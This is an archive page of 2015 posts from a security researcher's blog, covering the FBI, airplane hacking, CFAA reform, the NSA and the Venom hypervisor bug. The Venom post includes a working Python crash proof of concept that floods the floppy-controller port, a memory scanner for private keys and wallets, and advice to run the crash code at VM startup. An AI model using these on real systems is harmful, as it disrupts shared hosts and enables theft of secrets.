Saturday, May 16, 2015

Our Lord of the Flies moment

In its war on researchers, the FBI doesn't have to imprison us. Merely opening an investigation into a researcher is enough to scare away investors and bankrupt their company, which is what happened last week with Chris Roberts. The scary thing about this process is that the FBI has all the credibility, and the researcher none -- even among other researchers. After hearing only one side of the story, the FBI's side, cybersecurity researchers quickly turned on their own, condemning Chris Roberts for endangering lives by taking control of an airplane.


As reported by Kim Zetter at Wired, though, Roberts denies the FBI's allegations. He claims his comments were taken out of context, and that when he talked about taking control of a plane, he was talking about a simulator, not a real airplane.

I don't know which side is telling the truth, of course. I'm not going to defend Chris Roberts in the face of strong evidence of his guilt. But at the same time, I demand real evidence of his guilt before I condemn him. I'm not going to take the FBI's word for it.

We know how things get distorted. Security researchers are notoriously misunderstood. To the average person, what we say is all magic technobabble anyway. They find this witchcraft threatening, so when we say we "could" do something, it's interpreted as a threat that we "would" do something, or even that we "have" done something. Important exculpatory details, like "I hacked a simulation", get lost in all the technobabble.

Likewise, the FBI is notoriously dishonest. Until last year, they forbade audio/visual recording of interviews, preferring instead to take notes. This enshrines any misunderstandings in the official record. The FBI has long abused this, such as when threatening people into informing on friends. It's unlikely the agents had the technical background to understand what Chris Roberts said; it's likely they willfully misunderstood him in order to justify a search warrant.

There is a war on researchers. What we do embarrasses the powerful. They will use any means possible to stop us, such as using the DMCA to suppress publication of research, or using the CFAA to imprison researchers. Criminal prosecution is so one-sided that it rarely gets that far. Instead, the mere threat of prosecution ruins lives, getting people fired or bankrupted.

When they come for us, the narrative will never be on our side. They will have constructed a story that makes us look very bad indeed. It's scary how easily the FBI convicts people in the press. They have great leeway to concoct any story they want. Journalists then report the FBI's allegations as fact. The targets, who need to remain silent lest their words be used against them, can do little to defend themselves. In the Matt Dehart case, for example, the FBI alleges child pornography, but when you look into the details, it's nothing of the sort. The mere taint of the allegation makes people run from supporting Dehart. Similarly with Chris Roberts, the FBI wove a tale of endangering an airplane, based on no evidence, and everyone ran from him.

We need to stand together or fall alone. No, this doesn't mean ignoring malfeasance on our side. But it does mean that, absent clear evidence of guilt, we stand with our fellow researchers. We shouldn't go all Lord of the Flies on the accused, eagerly devouring Piggy because we are so relieved it wasn't us.

P.S. Alex Stamos is awesome; don't let my bitch-slapping of him make you believe otherwise.

Friday, May 15, 2015

Those expressing moral outrage probably can't do math

Many are discussing the FBI document where Chris Roberts ("the airplane hacker") claimed to an FBI agent that at one point, he hacked the plane's controls and caused the plane to climb sideways. The discussion hasn't elevated itself above the level of anti-vaxxers.

It's almost certain that the FBI's account of events is not accurate. The technical details are garbled in the affidavit. The FBI is notorious for hearing what they want to hear from a subject, which is why for years their policy was to forbid recording devices during interrogations. If they need Roberts to have said "I hacked a plane" in order to get a search warrant, then that's what their notes will say. It's like cops who yank the collar of a drug-sniffing dog to make it "trigger" on drugs, so they have an excuse to search the car.

Also, security researchers are notorious for being misunderstood. Whenever we make innocent statements about what we "could" do, others often interpret this either as a threat or a statement of what we already have done.

Assuming this scenario is true, that Roberts did indeed control the plane briefly, many claim that this is especially reprehensible because it endangered lives. That's the wrong way of thinking about it. Yes, it would be wrong because it means accessing computers without permission, but the "endangered lives" component doesn't necessarily make things worse.

Many operate under the principle that you can't put a price on a human life. That is false, provably so. If you take your children with you to the store instead of paying the neighbor $10 to babysit them, then you've implicitly put a price on your children's lives. Traffic accidents are a leading cause of death for children, and driving to the store is vastly more dangerous than leaving the kids at home, so you've priced that danger at around $10.
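Here's that implicit arithmetic as a minimal sketch; every number in it is invented for illustration, since the point is only that the choice implies a price, not that these particular values are right.

```python
# Implied price of risk -- all numbers are invented placeholders.
babysitter_cost = 10.0   # dollars saved by skipping the babysitter
p_added_fatality = 1e-7  # assumed extra chance the car trip kills a child

# Declining to pay $10 to avoid risk p means you've priced the risk at
# no more than $10, which implies a life is worth no more than $10 / p.
implied_ceiling_on_life = babysitter_cost / p_added_fatality
print(f"implied price ceiling on a life: ${implied_ceiling_on_life:,.0f}")
```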

Likewise, society has limited resources. Every dollar spent on airline safety has to come from somewhere, such as from AIDS research. With current spending, society is effectively saying that the lives of airline passengers are worth more than the lives of AIDS victims.

Does pentesting an airplane put passenger lives in danger? Maybe. But then so does leaving airplane vulnerabilities untested, which is the current approach. I don't know which one is worse -- but I do know that your argument is wrong when you claim that endangering planes is unthinkable. It is thinkable, and we should be thinking about it. We should be doing the math to measure the risk, pricing each of the alternatives.
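As a sketch of what "doing the math" would look like -- every input below is a made-up placeholder, and the whole argument is that somebody should actually measure them:

```python
# Compare expected deaths per year under two policies.
# Every input is an invented placeholder, not a measurement.

def expected_deaths(p_catastrophe_per_year, deaths_per_catastrophe):
    return p_catastrophe_per_year * deaths_per_catastrophe

# Policy A: leave avionics untested; assume some yearly chance an
# attacker finds and uses a vulnerability that brings a plane down.
untested = expected_deaths(1e-4, 150)

# Policy B: allow live pentests; assume a far smaller yearly chance a
# test itself goes catastrophically wrong, because found bugs get fixed.
pentested = expected_deaths(1e-6, 150)

print(f"untested:  {untested:.6f} expected deaths/year")
print(f"pentested: {pentested:.6f} expected deaths/year")
```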

It's like whistleblowers. The intelligence community hides illegal mass surveillance programs from the American public because it would be unthinkable to endanger people's lives. The reality is that the danger from the programs themselves is worse, and when whistleblowers revealed them, nothing bad happened.

The same is true here. Airlines assure us that planes are safe and cannot be hacked -- while simultaneously saying it's too dangerous for us to try hacking them. Both claims cannot be true, so we know something fishy is going on. The only way to pierce this bubble and find out the truth is to do something the airlines don't want, such as whistleblowing or live pentesting.

The systems are built to be reset and manually overridden in-flight. Hacking past the entertainment system to prove one could control the airplane introduces only a tiny danger to the lives of those on board. Conversely, the current "security through obscurity" stance of the airlines and FAA is an enormous danger. Deliberately crashing a plane just to prove it's possible would of course be unthinkable. But running a tiny risk of crashing the plane, in order to prove it's possible, probably will harm nobody. If never having a plane crash due to hacking is your goal, then a live test on a plane during flight is a better way of achieving it than the current official policy of keeping everything secret. The supposedly "unthinkable" option of a live pentest is still (probably) less dangerous than the "thinkable" options.

I'm not advocating anyone do it, of course. There are still better options, such as hacking the system once the plane is on the ground. My point is only that it's not an unthinkable danger. Those claiming it is haven't measured the dangers and alternatives.

The same is true of all security research. Those outside the industry believe in security-through-obscurity: that if only they can keep details hidden and pentesters away from computers, then they will be safe. We inside the community believe the opposite, in Kerckhoffs' Principle of openness, and that the only trustworthy systems are those which have been thoroughly attacked by pentesters. There is a short-term cost to releasing vulns in Adobe Flash, because hackers will use them. But the long-term benefit is that this leads to a more secure Flash, and better alternatives like HTML5. If you can't hack planes in-flight, then what you are effectively saying is that our belief in Kerckhoffs' Principle is wrong.


Each year, people die (or are permanently injured) from vaccines. But we do vaccines anyway because we are rational creatures who can do math, and can see that the benefits of vaccines outweigh the dangers by something like a million to one. We look down on the anti-vaxxers who rely upon "herd immunity" and the fact that the rest of us put our children through that small danger in order to protect their own. We should apply the same rationality to airline safety. If you think pentesting live airplanes is unthinkable, then you should similarly be able to do the math and prove it, rather than rely upon irrational moral outrage.

I'm not arguing hacking airplanes mid-flight is a good idea. I'm simply pointing out it's a matter of math, not outrage.

Thursday, May 14, 2015

Revolutionaries vs. Lawyers

I am not a lawyer; I am a revolutionary. I mention this in response to Volokh posts [1, 2] on whether the First Amendment protects filming police. It doesn't -- it's an obvious stretch, and relies upon concepts like a protected "journalist" class who enjoys rights denied to the common person. Instead, the Ninth Amendment, combined with the Declaration of Independence, is what makes filming police a right.

The Ninth Amendment simply says the people have more rights than those enumerated by the Bill of Rights. There are two ways of reading this. Some lawyers take the narrow view, that this doesn't confer any additional rights, but is just a hint on how to read the Constitution. Some take a more expansive view, that there are a vast number of human rights out there, waiting to be discovered. For example, some wanted to use the Ninth Amendment to insist "abortion" was a human right in Roe v. Wade. Generally, lawyers take the narrow view, because the expansive view becomes ultimately unworkable when everything is a potential "right".

I'm not a lawyer, but a revolutionary. For me, rights come not from the Constitution, the Bill of Rights, or Supreme Court decisions. They come from the Declaration of Independence: the "natural rights" assertion, but also things like the following phrase used to justify the colonies' revolution:
...when a long train of abuses and usurpations, pursuing invariably the same Object evinces a design to reduce them [the people] under absolute Despotism, it is their right, it is their duty, to throw off such Government...
The state inevitably strives to protect its privilege and power at the expense of the people. The Bill of Rights exists to check this -- so that we don't need to resort to revolution every few decades. The First Amendment protects free speech not because free speech is a good thing, but because it's the sort of thing the state wants to suppress to protect itself.

In this context, therefore, abortion isn't a "right". Abortion neither helps nor harms the despot's power. Whether or not it's a good thing, whether it should be legal, or even whether the constitution should mention abortion, isn't the issue. The only issue here is how it relates to government power.

Thus, we know that "recording police" is a right under the Declaration of Independence. The police want to suppress it, because it challenges their despotism. We've seen this in the last year, as films of police malfeasance has led to numerous protests around the country. If filming the police were illegal in the United States, this would be an usurpation that would justify revolt.

Everyone knows this, so they struggle to fit it within the constitution. In the article above, a judge uses fancy rhetoric to try to shoehorn it into the First Amendment. I suggest they stop resisting the Ninth and use that instead. They don't have to accept an infinite number of "rights" in order to use those clearly described in the Declaration of Independence. The courts should simply say filming police helps us resist despots, and is therefore protected by the Ninth Amendment channeling the Declaration of Independence.

The same sort of argument happens with the Fourth Amendment right to privacy. The current legal climate talks about a reasonable expectation of privacy. This is wrong. The correct reasoning should start with a reasonable expectation of abuse by a despot.

Under current reasoning about privacy, government can collect all phone records, credit card bills, and airline receipts -- without a warrant. That's because this information is shared with a third party, the company you are doing business with, so you don't have a "reasonable expectation of privacy".

Under my argument about the Ninth, this should change. We all know that a despot is likely to abuse these records to maintain their power. Therefore, in order to protect against a despot, the people have the right that this information should be accessible only with a warrant, and that all accesses by the government should be transparent to the public (none of this secret "parallel construction" nonsense).

We all know there is a problem here needing resolution. Cyberspace has put our "personal effects" in the cloud, where third parties have access to them, yet we still want them to be "private". We struggle with how a third party (like Facebook) might invade that privacy. We struggle with how the government might invade that privacy. It's a substantial enough change that I don't think precedent guides us -- not Katz, not Smith v. Maryland. I think the only guidance comes from the founding documents. The current state of affairs means that cyberspace has made personal effects obsolete -- I don't think that is correct.

Lastly, this brings me to crypto backdoors. The government is angry because even if Apple were to help them, they still cannot decrypt your iPhone. The government wants Apple to put in a backdoor, giving the police a "Golden Key" that will decrypt any phone. The government reasonably argues that backdoors would only be used with a search warrant, and thus that it has the authority to mandate them. The average citizen deserves the protection of the law against criminals who would use crypto to hide their evil deeds from the police. When an evil person has kidnapped, raped, and murdered your daughter, all the data on their encrypted phone should be available to the police in order to convict them.

But here's the thing. In the modern, interconnected world, we can only organize a revolution against our despotic government if we can send backdoor-free messages among ourselves. This is unlikely to be much of a concern in the United States, of course, but it's a concern throughout the rest of the world, like Russia and China. The Arab Spring was a powerful demonstration of how modern technology mobilized the populace to force regime change. Despots with crypto backdoors would be able to prevent such things.

I use Russia/China here, but I shouldn't have to. Many argue that since America is free, and the government under the control of the people, that we operate under different rules than those other despotic countries. The Snowden revelations prove this wrong. Snowden revealed a secret, illegal, mass surveillance program that had been operating for six years under the auspices of all three branches (executive, legislative, judicial) and both Parties (Republican and Democrat). Thus, it is false that our government can be trusted with despotic powers. Instead, our government can only be trusted because we deny it despotic powers.

QED: the people have the right to backdoor-free crypto.

I write this because I often hang out with lawyers. They have a masterful command of all the legal decisions and precedent, such as the Katz decision on privacy. It's not that I disrespect their vast knowledge on the subject, or deny their reasoning is solid. It's that I just don't care. I'm a revolutionary. Cyberspace, 9/11, and the war on drugs have led to an alarming number of intolerable despotic usurpations. If you lawyers believe nothing in the Constitution or Bill of Rights can prevent this, then it's our right, even our duty, to throw off the current system and institute one that can.

Wednesday, May 13, 2015

NSA: ad hominem is still a fallacy

An ad hominem attack is where, instead of refuting a person's arguments, you attack their character. It's a fallacy that enlightened people avoid. I point this out because of a piece in The Intercept about how some of the NSA's defenders have financial ties to the NSA. That argument is a fallacy.


The first rule of NSA club is: don't talk about NSA club. The intelligence community frequently publishes rules to this effect for all their employees, contractors, and anybody else under their thumb. They don't want their people talking about the NSA, even in its defense. Their preferred defense is lobbying politicians privately in back rooms. They hate having things out in the public. Or, when they do want something public, they want to control the messaging (they are control freaks). They don't want their supporters muddying the waters with conflicting messaging, even if it is all positive. What they fear most is bad supporters, the type that does more harm than good. Inevitably, some defender of the NSA is going to say "ragheads must die", and that'll be the one thing attackers cherry-pick to smear the NSA's reputation.

Thus, you can tell how close somebody is to the NSA by how much they talk about the NSA -- the closer to the NSA they are, the less they talk about it. That's how you know that I'm mostly an outsider -- if I actually had the close ties to the NSA that some people think I do, then I couldn't publish this blogpost.

Note that there are a few cases where this might not apply, like Michael Hayden (former head) and Stewart Baker (former chief lawyer). Presumably, these guys have such close ties with insiders that they can coordinate messaging. But they are exceptions, not the rule.


The idea of "conflict of interest" is a fallacy because it works both ways. You'd expect employees of the NSA to like the NSA. But at the same time, you'd expect that those who like the NSA would also seek a job at the NSA. Thus, it's likely they sincerely like the NSA, and not just because they are paid to do so.

This applies even to Edward Snowden himself. In an interview, he said of the NSA, "These are good people trying to do hard work for good reasons". He went to work for the intelligence community because he believed in their mission, that they were good people. He leaked the information because he felt the NSA overstepped its bounds, not because the mission of spying for your country was wrong.

If the "conflict of interest" fallacy were correct, then it would apply to The Intercept as well, whose entire purpose is to fan the flames of outrage over the NSA. If the conflict of interest about NSA contractors is a matter of public concern, then so is the amount Glenn Greenwald is getting paid for his stash of Snowden secrets, and how much Snowden gets paid living in Russia.

The reality is this. Those who attack the NSA, like The Intercept, are probably sincere in their attacks. Likewise, those who defend the NSA are likely sincere in their defense.


As the book To Kill a Mockingbird put it, you don't truly know somebody until you've walked a mile in their shoes. Many defend the NSA simply because they've walked a mile in the NSA's shoes. I say this from my own personal perspective. True, I often attack the NSA, because I agree with Snowden that surveillance has gone too far. But at the same time, again like Snowden, I feel they've been unfairly demonized -- because I've seen them up close and personal. In the intelligence community, it's the NSA who takes civil rights seriously, and it's organizations like the DEA, ATF, and FBI that'll readily stomp on your rights. We should be hating those other organizations more than the NSA.

It's those like The Intercept who are the real bigots here. They make no attempt to see things from another point of view. As a technical expert, I know their stories based on Snowden leaks are often bunk -- exploited to trigger rage, with little interest in understanding the truth.


Stewart Baker and Michael Hayden are fascist pieces of crap who want a police state. That doesn't mean their arguments are always invalid, though. They know a lot about the NSA. They are worth considering, even if wrong.

Some brief technical notes on Venom

Like you, I was displeased by the lack of details on the "Venom" vulnerability, so I thought I'd write up what little I found.

The patch to the source code is here. Since the commit note references CVE-2015-3456, we know it's Venom:
http://git.qemu.org/?p=qemu.git;a=commit;h=e907746266721f305d67bc0718795fedee2e824c

Looking up those terms, I find writeups, such as this one from RedHat:
https://securityblog.redhat.com/2015/05/13/venom-dont-get-bitten/

It comes down to a typical buffer overflow (heap or stack, depending), where the attacker can write large amounts of data past the end of a buffer in the hypervisor's floppy-controller emulation. To turn that into code execution rather than a mere crash, you'd likely need some knowledge of the host operating system and whatever protections, like NX or ASLR, it applies.

The details look straightforward, which means a PoC (proof-of-concept exploit) should arrive by tomorrow. (Update: a PoC has arrived today here).

This is a hypervisor privilege-escalation bug. To exploit it, you'd sign up with one of the zillions of VPS providers and get a Linux instance. You'd then likely replace the floppy driver in the Linux kernel with a custom driver that exploits this bug. You have root access to your own kernel, of course, which you are going to escalate to root access on the hypervisor.
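For a mere crash-test, you don't even need a custom driver. Here's a minimal sketch of what the public PoCs boil down to, assuming root inside an x86 Linux guest where /dev/port exposes I/O ports. Expect it to crash the guest, and a vulnerable hypervisor along with it -- run it only against systems you own.

```python
# Flood the emulated floppy controller's data FIFO (CVE-2015-3456).
# WARNING: this is a crash-test, not an exploit.

FDC_DATA_PORT = 0x3f5    # the FDC's FIFO data port
FD_CMD_READ_ID = 0x0a    # a command that leaves the FDC expecting more bytes

with open("/dev/port", "wb", buffering=0) as port:
    port.seek(FDC_DATA_PORT)
    port.write(bytes([FD_CMD_READ_ID]))
    # A vulnerable QEMU never resets its FIFO index, so writing far more
    # bytes than the command needs runs off the end of the buffer.
    for _ in range(10_000_000):
        port.seek(FDC_DATA_PORT)
        port.write(b"\x42")
```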

People suggest adding an exploit to toolkits like the Metasploit Framework -- but I don't think it has a framework for running drivers. This would instead be more of a one-off.

Once you've gained control of the host, you'd then of course gain access to any of the other instances. This would be a perfect bug for the NSA. Bitcoin wallets, RSA private keys, forum passwords, and the like are easily found by searching raw memory. Once you've popped the host, reading the memory of the other hosted virtual machines is undetectable. Assuming the NSA had a program, debugged over the years, that looked for such stuff, for $100,000 they could buy a ton of $10 VPS instances around the world, then run the search. All sorts of great information would fall out of such an effort -- you'd probably make your money back from discovered Bitcoin alone.
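To give a feel for how cheap that search is, here's a toy scanner over a raw memory image. The patterns are illustrative stand-ins, not what a serious tool would match on.

```python
# Grep a raw memory dump for likely secrets -- illustrative patterns only.
PATTERNS = [
    b"-----BEGIN RSA PRIVATE KEY-----",   # PEM-encoded private keys
    b"-----BEGIN PRIVATE KEY-----",
    b"wallet.dat",                        # hints a Bitcoin wallet is nearby
]

def scan(path, chunk_size=1 << 20):
    overlap = max(len(p) for p in PATTERNS) - 1  # catch matches on chunk edges
    hits, tail, pos = [], b"", 0
    with open(path, "rb") as f:
        while True:
            chunk = f.read(chunk_size)
            if not chunk:
                return hits
            buf = tail + chunk
            for pat in PATTERNS:
                i = buf.find(pat)
                while i != -1:
                    # Absolute file offset of the match (short patterns
                    # near a chunk boundary may be reported twice).
                    hits.append((pos - len(tail) + i, pat))
                    i = buf.find(pat, i + 1)
            tail = buf[-overlap:]
            pos += len(chunk)
```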

I'm not sure how data centers are going to fix this, since they have to reboot the host systems to patch. Customers hate reboots -- many would rather suffer the danger than have their instance reboot. Some datacenters may be able to pause or migrate instances, which will make some customers happier.

By the way, once a PoC is released, you should probably add it to your VM's startup scripts. It'll likely crash the host, bringing all the VMs down. That's a good thing -- better to crash the host than allow it to be exploited.

By the way, we in the security community are a bit offended by the exploit-sploitation by CrowdStrike (VENOM! With logo!!), but yes, it's still a great find and a serious bug.

Saturday, May 02, 2015

How to fix the CFAA

Someone on Twitter asked for a blogpost on how I'd fix the CFAA, the anti-hacking law. So here is my proposal.

The major problem with the law is that the term "authorized" isn't clearly defined. You non-technical people think the meaning is obvious, because you can pick up a dictionary and simply point to a definition. However, in the computer world, things are a bit more complicated.

It's like a sign on a store window saying "No shirt, no shoes, no service" -- but you walk in anyway with neither. You know your presence is unwanted, but are you actually trespassing? Is your presence not "authorized"? Or, should we demand a higher standard, such as when the store owner asks you to leave (and you refuse) that you now are trespassing/unauthorized?

What happens on the Internet is that websites routinely make public data they actually don't want people to access. Is accessing such data unauthorized? We saw this a couple days ago, when Twitter accidentally published its quarterly results an hour early on its website. An automated script discovered this and republished Twitter's results to a wider audience, ironically using Twitter to do so. This knocked $5 billion off Twitter's market valuation. It was obviously unintentional on the part of the automated script, so not against the law, but it still makes us ask whether the access was "authorized".

Consider if I'd been browsing Twitter's investor page, as the script did, and noticed the link. I would've thought to myself "this is odd, the market doesn't close for another hour, I'll bet this is a mistake". Would I be authorized in clicking on that link, seeing the quarterly results, and trading stocks/options based on that information? In other words, I know that Twitter made a mistake and does not want me to do so, but since they made the information public, this doesn't mean my access is unauthorized. What if I write a script to check Twitter's investor page every quarter, hoping they make a mistake again, thereby profiting from it?
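Such a script is trivial to write, which is part of the problem. A sketch, with a placeholder URL rather than Twitter's real investor page:

```python
# Poll a public investor-relations page for an early filing.
import time
import urllib.request

URL = "https://investor.example.com/quarterly-results"  # placeholder URL

baseline = None
while True:
    with urllib.request.urlopen(URL) as resp:
        page = resp.read()
    if baseline is not None and page != baseline:
        print("page changed before market close -- possible early filing")
        break
    baseline = page
    time.sleep(60)  # check once a minute
```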

As a techy, I often encounter similar scenarios. I cannot read the statute in order to figure out whether my proposed conduct would be in violation. I talk with many lawyers who are experts on the statute, and they cannot tell me if my proposed conduct is permissible under the statute. This isn't some small area of ambiguity between two clear sides of the law, this is a gaping hole where nobody can answer the question. The true answer is this: it depends upon how annoyed people will be if my automated script moves Twitter's stock price by a large amount.

You'd think this is an obvious candidate for the "void for vagueness" doctrine. The statute is written in such a way that reasonable people cannot figure out what is permissible under the law. This allows the law to be arbitrarily and prejudicially applied, as indeed it was in the Weev case.

The reason for this confusion comes from the 1980s origin of the law. Back then, computers were closed, and you needed explicit authorization, such as a password, to access them. The web changed that to open, public computers that require no password or username. Authorization became implicit. I did not explicitly give you authorization to download this blogpost from my server, but you intentionally did so anyway.

This is legal, but I'm not a lawyer, and I don't know how it's legal. Some lawyers have justified it as "social norms", but that's bogus: it's the social norm now, but it wasn't then. If implicit authorization had been the norm back then, it would've been written into the law. The better answer is "nerd norms". Only nerds accessed computers back then, and implicit authorization was the norm for nerds. Now we have iPads, and everyone thinks they are a nerd, so nerd norms prevailed, and nobody went to jail for accessing the web while social norms were catching up.

But sometimes "iPad user norms" differ from "nerd norms", and that's where we see trouble in the cases involving Weev and Swartz. I could write a little script to automatically scrape all the investor pages of big companies, in case any make the same mistake Twitter did. I might get prosecuted because now I've done something iPad users consider abnormal: they might click on a link, but they would never write a script, so script writing is evil.

This brings me to the definition of "authorization". It should be narrowed according to "nerd norms". Namely, it should refer only to explicit authorization. If a website is public and gives things up while demanding authorization from nobody, then it's implicit that pretty much anything is authorized -- even when the website owners mistakenly publish something. In other words, following RFC2616 implicitly authorizes those who likewise follow that RFC.
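For the non-technical reader, that implicit handshake is the entire protocol. A minimal sketch of an RFC2616-style request: it names a resource, presents no credentials of any kind, and the server either answers or refuses.

```python
# A bare HTTP/1.1 GET -- note there is no username, password, or token.
import socket

sock = socket.create_connection(("example.com", 80))
sock.sendall(b"GET / HTTP/1.1\r\n"
             b"Host: example.com\r\n"
             b"Connection: close\r\n\r\n")
print(sock.recv(500).decode(errors="replace"))  # status line and headers
sock.close()
```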

I am not a lawyer, but Orin Kerr is. His proposal adds the following language, which sounds reasonable to me. It would clear up the confusion in my hypothetical investor-page scenario above: because I'm bypassing no technological barrier, and permission is implied, I'm not guilty.
"to circumvent technological access barriers to a computer or data without the express or implied permission of the owner or operator of the computer"
By the way, technically I'm only asking for clarification. If lawmakers want to define "unauthorized" broadly to include all "unwanted" access, then that would satisfy my technical concerns. But politically, I want the definition to go the other way, narrowly, so that I'm not violating the law by accessing information you accidentally made public, even though I know you don't want me to access it.


My second concern is with the penalties in the law. Currently we are seeing a 14-year-old kid in Florida charged with a (state) felony for a harmless prank on his teacher's computer. There's no justification for such harsh penalties, especially since, if they could catch them all, it'd make felons out of hundreds of thousands of kids every year. Misdemeanors are good punishments for youthful exuberance. This is especially true since 90% of those who'll go on to be the defenders of computers in the future will have gone through such a phase in their development. Youth is about testing boundaries. We should have a way of informing youth when they've gone too far, but in a way that doesn't destroy their lives.

Most of the computer crimes committed are already crimes in their own right. If you steal money, that's a crime, and it should not matter if a computer was violated in the process. There's no need for additional harsh penalties in an anti-hacking law.

Orin's proposed changes also include reducing the penalties, bringing things down to misdemeanors. I don't understand the legalese, but they sound good. From what I understand, though, there is a practical problem. Computer crime is almost always across state lines, but federal prosecutors don't want to get involved in misdemeanors. This ends up meaning that a federal law about misdemeanors has little practical effect -- or at least, that's what I'm told.

In the coming election, an issue for both Democrats and Republicans is the number of felons in jail in this country, which is 10 times higher than in any other civilized country. It's a race thing, but even if you are white, the incarceration rate is 5 times that of Europe. I point this out because politically, I oppose harsh jail sentences in general. Being a technical expert is the reason for wanting the first change above, but my desire for this second change is purely due to my personal politics.


Summary

I am not a lawyer or policy wonk, so I could not possibly draft specific language. My technical concern is that the definition of "authorized" in the current statute is too vague when applied to public websites and needs to be clarified. My personal political desire is that this definition should be narrow, and the penalties for violating the law should be lighter.


Friday, May 01, 2015

Ultron didn't save the world

The movie Avengers: Age of Ultron has a message for us in cybersec: In our desire to save the world, we are likely to destroy it.

Tony Stark builds "Ultron" to save the world, to bring peace in our time. As a cybernetic creation, Ultron takes this literally, and decides the best way to bring peace is to kill all humans.

The problem, as demonstrated by the movie, isn't that there was a bug in Stark's code. It was the hubris of thinking that Stark could protect everyone. Inevitably, protecting everyone meant ruling everyone, bringing peace by force. It's the same hubris behind the USA's effort to bring peace to Iraq and Afghanistan.

I mention this because in the cybersecurity industry, there are many who propose to bring security through force. They want government to impose liability on software makers, dictate how they write code, and punish them for doing things wrong.

This sounds reasonable. After all, nobody wants medical equipment like pacemakers to be hacked, or cars to crash, or airplanes to fall out of the air. But here's the thing: it's a tradeoff. Computer-controlled planes and cars can save lives by taking fallible humans out of the equation. Computer-controlled devices have the potential to vastly improve health, whether it's Apple Watches monitoring your heart, pacemakers, insulin pumps, or sensors embedded in the body. While these devices can be hacked, the practical reality is that if an evildoer wanted to kill people, bombs and bullets are still easier than hacking medical devices. Standards and liability, on the other hand, will chill innovations -- innovations that save lives. The fallacy of asserting authority to bring security is that it can kill people, because the innovation that would've saved them was delayed by developers worrying too much about hackers.

The cybersecurity industry is weird. We are the first to point out the hollow rhetoric of the surveillance and police state. Yet we are the first to become totalitarian when we think it's going to be us who are in control. No, we should learn from Tony Stark: even when it's us "good guys" running the show, we should still resist the urge to impose our authority by force. The tradeoffs from the security we demand are often worse than the hackers it would stop.

Review: Avengers, Age of Ultron

Today was the opening of the movie "Avengers: Age of Ultron". The best way to describe it is this. On the first date, you went and saw "The Avengers". You felt the rush of something new, and you were quite satisfied. This movie, "Age of Ultron", is the second date. You already know what to expect, but that doesn't matter, because you progress past the holding-hands stage. You didn't go all the way, but you know that's coming on the third date, with "Avengers: Infinity Wars".

Remember that this movie is part of the Marvel Avengers arc, consisting of Iron Man (3 movies), Captain America (2), Thor (2), Hulk, and Avengers (2). This arc also includes two TV series, and a (so far) unrelated Guardians of the Galaxy movie. Everything is leading to the Infinity Wars movies.

Wednesday, April 29, 2015

Some notes on why crypto backdoors are unreasonable

Today, a congressional committee held hearings about 'crypto backdoors' that would allow the FBI to decrypt text messages, phone calls, and data on phones. The thing to note about this topic is that it's not anywhere close to reasonable public policy. The technical and international problems are unsolvable with anything close to the proposed policy. Even if the policy were reasonable, it's unreasonable that law enforcement should be lobbying for it.